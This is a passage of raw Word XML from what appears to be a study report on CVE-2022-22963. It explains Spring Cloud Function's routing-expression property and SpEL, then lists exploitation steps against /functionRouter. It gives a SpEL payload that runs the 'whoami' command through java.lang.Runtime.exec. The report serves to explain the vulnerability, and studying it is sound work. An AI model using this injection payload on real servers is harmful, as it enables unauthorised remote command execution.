        <w:t>To enable clients to access these services through a unified API, you can use Spring Cloud Gateway to create a routing layer. You can configure Spring Cloud Gateway to route requests to the appropriate service based on the requested path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2921EC" w14:textId="1480FB7E" w:rsidR="00E93830" w:rsidRPr="00E93830" w:rsidRDefault="00E93830" w:rsidP="00E93830">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93830">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>For example, you can configure Spring Cloud Gateway to route requests that start with "/users" to the user service, requests that start with "/products" to the product service, and requests that start with "/orders" to the order service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C15A89" w14:textId="660FA82A" w:rsidR="00C5299B" w:rsidRDefault="00C5299B" w:rsidP="00C5299B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B34F91" w14:textId="4422BA79" w:rsidR="00C5299B" w:rsidRDefault="00C5299B" w:rsidP="00C5299B">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>What is the vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035895BE" w14:textId="76F6E960" w:rsidR="00C5299B" w:rsidRDefault="005D78BD" w:rsidP="00C5299B">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D78BD">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CVE-2022-22963</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is vulnerability in the Spring Cloud Function that uses the routing functionality. The routing functionality gives the ability to provide a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection as a routing-expression in</w:t>
      </w:r>
      <w:r w:rsidR="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00035778" w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>spring.cloud.function.routing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00035778" w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-expression</w:t>
      </w:r>
      <w:r w:rsidR="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> the web request, which may result in RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65777886" w14:textId="77777777" w:rsidR="00035778" w:rsidRPr="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33579B93" w14:textId="77777777" w:rsidR="00035778" w:rsidRPr="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C746D35" w14:textId="14F5C24B" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332B7F54" w14:textId="26C08951" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4360AD0F" w14:textId="77777777" w:rsidR="00035778" w:rsidRPr="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662E6A20" w14:textId="2ECBD343" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>spring.cloud.function.routing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B7BF0" w14:textId="77777777" w:rsidR="00035778" w:rsidRPr="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C02F41B" w14:textId="437927B2" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">property in Spring Cloud </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>that’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to define a routing expression that determines how incoming requests are routed to a specific function in a serverless environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> So It’s used to communicate routing instructions via Message headers and it </w:t>
      </w:r>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>relies on Spring Expression Language (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00F86A" w14:textId="1346F9F7" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F02B29" w14:textId="12791DEE" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7DF52C" w14:textId="792E19EF" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows user to provide string representation of Java code to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A5CD39" w14:textId="0BBEF706" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381769A3" w14:textId="70244579" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Example use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>spring.cloud.function.routing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A17F6" w14:textId="1F8CC845" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>spring.cloud.function.routing-expression=headers.contentType.toString().equals('text/plain') ? 'echo' :'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>devNull</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00035778">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EBB78F" w14:textId="00C74007" w:rsidR="00035778" w:rsidRDefault="00035778" w:rsidP="00035778">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">This expression is checking if the content type of the incoming request is ‘text/plain’. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F00CD4" w14:textId="3B698128" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00035778">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">If it is, than it will be routed to the echo function, if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> not, it will be routed to the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598CC1CF" w14:textId="3A6A04CE" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00035778">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>devNull</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10473153" w14:textId="163BF281" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00035778">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D2FEEE" w14:textId="7B9F7095" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00B230A7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Exploitation of the vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25270DFE" w14:textId="2D605287" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00B230A7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634AC8A0" w14:textId="570A9CAB" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00B230A7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Find the path to the routing function on the webserver (default: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>functionRouter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64D1DB7B" w14:textId="0E3A29F9" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00B230A7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to inject java code as Routing Expression that executes our commands on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868EC01" w14:textId="713774B1" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00B230A7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Execute commands via the routing expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784B178" w14:textId="6331E01D" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00B230A7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F93A7" w14:textId="66D1EBF2" w:rsidR="00B230A7" w:rsidRDefault="00B230A7" w:rsidP="00B230A7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>payload=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>f'T</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>java.lang.Runtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>().exec("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B230A7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55982E" w14:textId="54BBDA73" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00B230A7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35FA9BCF" w14:textId="50854F54" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Payload explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E14ADEC" w14:textId="7924F37D" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This code is creating a string that contains a Java method call to execute the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" command using the Runtime class. This means that when this string is executed, it will attempt to execute the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" command on the underlying operating system using the Java Runtime API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB6E30B" w14:textId="3DBE11C2" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBC07C8" w14:textId="2B83685D" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B47700E" w14:textId="2EA2B2BC" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AFB4A2" w14:textId="19B178A1" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486D80CB" w14:textId="2BF2D074" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D33AA6A" w14:textId="621D67CB" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D23B4EF" w14:textId="7DE0F4A9" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A16EE4E" w14:textId="77777777" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393FBCB6" w14:textId="36075BB1" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What’s the java runtime class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F713D9" w14:textId="77777777" w:rsidR="00D40DC8" w:rsidRPr="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>java.lang.Runtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> class in Java provides an interface to the underlying operating system's runtime environment. It is a singleton class that provides methods for managing the Java Virtual Machine (JVM) and interacting with the operating system. Some of the key functionalities provided by the Runtime class include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC15C00" w14:textId="77777777" w:rsidR="00D40DC8" w:rsidRPr="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4F8057" w14:textId="72503559" w:rsidR="00D40DC8" w:rsidRPr="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Running external processes: The exec() method in the Runtime class allows Java applications to execute external processes and commands on the underlying operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E11815" w14:textId="0A1B7F56" w:rsidR="00D40DC8" w:rsidRPr="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Memory management: The Runtime class provides methods for interacting with the JVM's memory management system, such as getting the amount of free memory and requesting garbage collection.</w:t>
      </w:r>
    </w:p>
